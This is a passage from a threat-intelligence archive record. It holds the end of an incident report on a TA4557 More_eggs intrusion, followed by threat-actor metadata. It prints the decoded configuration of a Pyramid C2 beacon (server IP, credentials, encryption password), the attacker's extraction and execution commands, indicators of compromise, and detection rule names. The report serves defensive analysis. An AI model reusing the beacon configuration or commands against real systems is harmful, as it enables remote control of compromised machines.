threat actor. One host showed persistent connections to the\r\nCloudflare IPv4 range during the intrusion, with DNS query requests to the following domains:\r\nDeploying Pyramid C2\r\nThe threat actor transferred the file python-3.10.4-embed-amd64.zip through the Cobalt Strike beacon. This zip file included\r\na number of files, including an exploit tool for Veeam. This was dropped on the beachhead in the user-writable\r\n‘ProgramData’ folder.\r\nThe zip file was masqueraded as a Python-3.10 install package. The attacker attempted to extract the zip file contents via\r\nPowerShell cmdlets; several combinations were attempted, but this ultimately failed.\r\nThe threat actor decided to use the Windows-provided utility ‘Tar’ instead.\r\nUsing the Tar utility, no target destination was specified by the threat actor. As a result, by default the extraction created \u003e200\r\nfiles in Windows\\System32.\r\nUndeterred, the threat actor used the 7zip command line utility that they had downloaded to the ProgramData folder.\r\nc:\\programdata\\ssh\\7za.exe x \"c:\\programdata\\ssh\\python-3.10.4-embed-amd64.zip\" -y\r\nUnfortunately, the threat actor made a similar error, with files (\u003e 200) extracted to the Windows\\SysWOW64 folder location\r\nthis time. This was due to their command session current directory being under C:\\Windows\\System32, with the application\r\nbeing 32-bit (SysWOW64).\r\nThe threat actor realized the error and switched to the correct current directory of C:\\ProgramData\\SSH. They used 7za\r\nagain to extract the contents (\u003e 200 files) into the correct location.\r\nA large number of file creation events were observed throughout this process (\u003e700 files), with Python files (.py extension) being\r\ncreated in Windows folder locations that could be unusual.\r\nOnce finally uncompressed, the threat actor ran the following Python file:\r\ncmd.exe /C \"python.exe cradle.py\"\r\nWhen analyzing the file cradle.py and decoding its content, we identified it was a Pyramid beacon with the following\r\nconfiguration:\r\npyramid_server='172.96.139.82'\r\npyramid_port='80'\r\npyramid_user='fLCi6UsgLYKdj7Fi'\r\npyramid_pass='Q6V26bKG68nLJ4T3UXkEFLJYsHvKgLVi'\r\nencryption='chacha20'\r\nencryptionpass='TestPass1'\r\nchacha20IV=b'12345678'\r\npyramid_http='http'\r\nencode_encrypt_url='/login/'\r\npyramid_module='base-bof_nanodump.py'\r\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.302\r\nThe IP address used for this C2 framework has been spotted sporadically by the DFIR Threat Intelligence Group with\r\nactivity in March, July, and September of 2024.\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nAtomic\r\n# TA4557 Resume Lure\r\njohnshimkus[.]com\r\n# more_eggs\r\npin.howasit[.]com\r\n108.174.197[.]15\r\n# Cobalt Strike\r\nshehasgone[.]com\r\n144.208.127[.]15\r\n# Pyramid\r\n172.96.139[.]82\r\n# Computer Name\r\nkali\r\nPACKERP-VUDV41R\r\nComputed\r\nAdditional Indicators provided by Proof Point\r\nDetections\r\nNetwork\r\nETPRO MALWARE Possible More_eggs Connectivity Check M2\r\nET INFO DNS Query to Cloudflare Tunneling Domain (argotunnel .com)\r\nET INFO Observed Cloudflare Tunneling Domain (argotunnel .com in TLS SNI)\r\nET INFO SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nETPRO MALWARE App Whitelist Bypass Via Com Scriptlet Inbound\r\nSigma\r\nDFIR Public Rules Repo:\r\n50046619-1037-49d7-91aa-54fc92923604 : AdFind Discovery\r\nDFIR Private Rules:\r\n28702b61-c530-49f8-9d22-de15166ab9c5 : Detection of Modified VeeamHax Tool Usage\r\n9b3a37ab-c97a-451b-94e8-09dae5e759e7 : Detecting the use of a workstation named 'kali' in the network\r\n275ec3d1-47c1-4fa9-a001-fa4feeb5e4d4 : Detect Disabling Windows Defender Threat Protection\r\n855a4c48-fdd5-4283-ba4b-c5ec167e4128 : Detection of Suspicious msxsl.exe Command Line Activity\r\n8c2dc958-3385-4ac7-acdb-eeecafa7944e : Detection of Suspicious IPv6 Address in RDP Sessions\r\n3b4e4f8d-50e3-48c8-a92b-fba48d5af7a1 : Execution IE4uinit.exe to Sideload Malicious Binaries\r\nSigma Repo:\r\na7c3d773-caef-227e-a7e7-c2f13c622329 : Bad Opsec Defaults Sacrificial Processes With Improper Arguments\r\n9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 : Cloudflared Tunnel Execution\r\na1d9eec5-33b2-4177-8d24-27fe754d0812 : Cloudflared Tunnels Related DNS Requests\r\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe\r\n5a105d34-05fc-401e-8553-272b45c1522d : CobaltStrike Service Installations - System\r\nbf361876-6620-407a-812f-bfe11e51e924 : Compressed File Extraction Via Tar.EXE\r\n0eb46774-f1ab-4a74-8238-1155855f2263 : Disable Windows Defender Functionalities Via Registry Keys\r\n36e037c4-c228-4866-b6a3-48eb292b9955 : DNS Query Request By Regsvr32.EXE\r\n9c14c9fa-1a63-4a64-8e57-d19280559490 : Invoke-Obfuscation Via Stdin\r\n9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 : Msxsl.EXE Execution\r\nc7e91a02-d771-4a6d-a700-42587e0b1095 : Network Connection Initiated By Regsvr32.EXE\r\ncd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXE\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\n6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca : Potentially Suspicious Child Process Of Regsvr32\r\n6385697e-9f1b-40bd-8817-f4a91f40508e : PowerShell Base64 Encoded Invoke Keyword\r\n9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Execution\r\n02d1d718-dd13-41af-989d-ea85c7fab93f : Rare Remote Thread Creation By Uncommon Source Image\r\n9525dc73-0327-438c-8c04-13c0e037e9da : Regsvr32 Execution From Potential Suspicious Location\r\nc3a99af4-35a9-4668-879e-c09aeb4f2bdf : Rundll32 Execution With Uncommon DLL Extension\r\n1775e15e-b61b-4d14-a1a3-80981298085a : Rundll32 Execution Without CommandLine Parameters\r\n8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Suspicious CMD Shell Output Redirect\r\nfff9d2b7-e11c-4a69-93d3-40ef66189767 : Suspicious Copy From or To System Directory\r\ne0b06658-7d1d-4cd3-bf15-03467507ff7c : Suspicious DotNET CLR Usage Log Artifact\r\nfb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64\r\nd95de845-b83c-4a9a-8a6a-4fc802ebf6c0 : Suspicious Group And Account Reconnaissance Activity Using Net.EXE\r\ndd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c : Suspicious Scheduled Task Creation via Masqueraded XML File\r\nb5de0c9a-6f19-43e0-af4e-55ad01f550af : Unsigned DLL Loaded by Windows Utility\r\n8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly\r\nc30fb093-1109-4dc8-88a8-b30d11c95a5d : Whoami.EXE Execution With Output Option\r\nb28e58e4-2a72-4fae-bdee-0fbe904db642 : Windows Defender Real-time Protection Disabled\r\n3a6586ad-127a-4d3b-a677-1e6eacdf8fde : Windows Shell/Scripting Processes Spawning Suspicious Programs\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/27899/27899.yar\r\nExternal Rules:\r\nMITRE ATT\u0026CK\r\nBrowser Information Discovery - T1217\r\nCreate Account - T1136\r\nCredentials from Password Stores - T1555\r\nDisable or Modify Tools - T1562.001\r\nDomain Account - T1087.002\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nExploitation for Privilege Escalation - T1068\r\nFile and Directory Discovery - T1083\r\nFile Deletion - T1070.004\r\nIngress Tool Transfer - T1105\r\nLocal Account - T1087.001\r\nLocal Groups - T1069.001\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nNetwork Service Discovery - T1046\r\nNetwork Share Discovery - T1135\r\nPhishing - T1566\r\nPowerShell - T1059.001\r\nProtocol Tunneling - T1572\r\nProxy - T1090\r\nPython - T1059.006\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nScheduled Task - T1053.005\r\nSecurity Software Discovery - T1518.001\r\nSource: https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\r\nThe same website template and stock image was used in a TA4557 campaign that Proofpoint covered below:\r\nThe pattern generated approximately 20 new process creation events per hour throughout the duration of the intrusion. This\r\nwas based on the parameter of 180 seconds, 60 minutes (hour) / 3 minutes (180 seconds) = 20 processes.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/"
	],
	"report_names": [
		"the-curious-case-of-an-egg-cellent-resume"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7a257844-df90-4bd4-b0f1-77d00ff82802",
			"created_at": "2022-10-25T16:07:24.376356Z",
			"updated_at": "2026-04-10T02:00:04.964565Z",
			"deleted_at": null,
			"main_name": "Venom Spider",
			"aliases": [
				"Golden Chickens",
				"TA4557",
				"Venom Spider"
			],
			"source_name": "ETDA:Venom Spider",
			"tools": [
				"More_eggs",
				"PureLocker",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Taurus Loader Reconnaissance Module",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraCrypt",
				"TerraLogger",
				"TerraPreter",
				"TerraRecon",
				"TerraStealer",
				"TerraTV",
				"TerraWiper",
				"ThreatKit",
				"VenomKit",
				"VenomLNK",
				"lite_more_eggs"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434627,
	"ts_updated_at": 1775792168,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b2fcc8df93282696196d20c2c84266dcaf293c35.pdf",
		"text": "https://archive.orkl.eu/b2fcc8df93282696196d20c2c84266dcaf293c35.txt",
		"img": "https://archive.orkl.eu/b2fcc8df93282696196d20c2c84266dcaf293c35.jpg"
	}
}